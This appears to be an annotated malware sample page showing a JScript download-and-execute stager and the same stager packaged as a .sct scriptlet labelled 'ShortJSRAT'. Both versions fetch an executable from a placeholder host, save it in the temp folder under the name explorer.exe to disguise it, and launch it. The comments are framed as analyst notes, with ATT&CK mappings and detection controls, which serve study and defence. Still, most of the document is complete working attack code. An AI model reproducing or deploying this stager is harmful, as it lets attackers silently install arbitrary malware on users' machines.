JS下载者

JS下载者

// JScript download-and-execute stub. It needs a host that exposes ActiveXObject.
// Flow: resolve %temp% -> HTTP GET a binary -> write it to disk as "explorer.exe"
// -> launch it. Nothing here verifies the downloaded bytes before they run.
//
// Analyst notes (observable behaviour of the lines below):
//   * COM objects instantiated: WScript.Shell, MSXML2.XMLHTTP,
//     Scripting.FileSystemObject, ADODB.Stream.
//   * Network: one cleartext HTTP GET issued by the script host process; the host
//     "x.x.x.x" is a redacted placeholder on this page, "bd.exe" is the resource name.
//   * File system: a file named explorer.exe is created under the user's temp
//     directory. The genuine Windows explorer.exe lives under %SystemRoot%, so that
//     image name running from a temp path is a masquerading indicator
//     (ATT&CK T1036.005); the transfer itself maps to T1105.
//   * Process: the script host becomes the parent of a process whose image is in %TEMP%.
//   * Controls that apply to this chain: AMSI-aware AV on script content, the Defender
//     ASR rule "Block JavaScript or VBScript from launching downloaded executable
//     content", and application control that denies execution from user-writable
//     directories.
var WSHShell = new ActiveXObject("WScript.Shell");
            // `path` is assigned without `var`, so it becomes an implicit global in the host.
            path = WSHShell.ExpandEnvironmentStrings("%temp%");
            // Drop location: <temp>/explorer.exe (forward slash as written in the source).
            var filepath = path+"/explorer.exe";
            var xhr = new ActiveXObject("MSXML2.XMLHTTP");
            // Third argument `false` makes the request synchronous: send() blocks until
            // the response has arrived. Plain http://, so the payload is visible to
            // network inspection.
            xhr.open("GET","http://x.x.x.x/bd.exe", false);
            xhr.send();
            // Only an HTTP 200 leads to a write/execute; any other status ends the script silently.
            if (xhr.Status == 200) {
                var fso = new ActiveXObject("Scripting.FileSystemObject");
                var stream = new ActiveXObject("ADODB.Stream");
                stream.Open();
                // Type 1 is the ADODB binary stream type (adTypeBinary), so the response
                // bytes are written unmodified.
                stream.Type = 1;
                stream.Write(xhr.ResponseBody);
                // Rewind before saving so the whole buffer is written out.
                stream.Position = 0;
                // Remove any earlier copy first; presumably because SaveToFile is called
                // without an overwrite option and would fail on an existing file.
                if (fso.FileExists(filepath)){
                   fso.DeleteFile(filepath);
                }
                stream.SaveToFile(filepath);
                stream.Close();
                // Launches the saved file through a second WScript.Shell instance. This is
                // the process-creation event to key on: parent = script host, image = %TEMP% path.
                new ActiveXObject("WScript.Shell").Exec(filepath);
            }

SCT (the same JScript wrapped in a Windows Script Component scriptlet):

<?XML version="1.0"?>
<scriptlet>
<!--
  Windows Script Component (.sct) wrapper around the JScript download-and-execute
  stub in the CDATA section below. The script sits directly inside <registration>
  and no <public> interface is declared, so it appears intended to run while the
  component's registration is processed rather than on a method call; confirm
  against the host that loads it.

  Analyst notes:
    * progid "ShortJSRAT" and the fixed classid below are literal strings in this
      sample and can be used as content indicators for this exact file.
    * Script components are handled by the script component runtime (scrobj.dll);
      a process that loads it and then makes an outbound HTTP request, writes an
      executable to %TEMP% and spawns it matches the behaviour scripted here.
    * How the scriptlet is delivered or loaded is not shown on this page.
-->
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            // Resolve the current user's temp directory through WScript.Shell.
            // `path` has no `var`, so it is an implicit global.
            var WSHShell = new ActiveXObject("WScript.Shell");
            path = WSHShell.ExpandEnvironmentStrings("%temp%");
            // Drop location: <temp>/explorer.exe. The genuine explorer.exe lives under
            // %SystemRoot%, so this image name in a temp path is a masquerading
            // indicator (ATT&CK T1036.005).
            var filepath = path+"/explorer.exe";
            var xhr = new ActiveXObject("MSXML2.XMLHTTP");
            // Synchronous (third argument false) cleartext HTTP GET; "x.x.x.x" is a
            // redacted placeholder host on this page.
            xhr.open("GET","http://x.x.x.x/bd.exe", false);
            xhr.send();
            // Nothing is written or executed unless the server answers 200.
            if (xhr.Status == 200) {
                var fso = new ActiveXObject("Scripting.FileSystemObject");
                var stream = new ActiveXObject("ADODB.Stream");
                stream.Open();
                // Type 1 = binary stream (adTypeBinary); response bytes are stored as-is.
                stream.Type = 1;
                stream.Write(xhr.ResponseBody);
                // Rewind so SaveToFile writes the full buffer.
                stream.Position = 0;
                // Delete a previous copy first; presumably because SaveToFile is called
                // without an overwrite option.
                if (fso.FileExists(filepath)){
                   fso.DeleteFile(filepath);
                }
                stream.SaveToFile(filepath);
                stream.Close();
                // Executes the saved file; the downloaded content is not checked
                // (no hash or signature test) before this call.
                new ActiveXObject("WScript.Shell").Exec(filepath);
            }


        ]]>
</script>
</registration>
</scriptlet>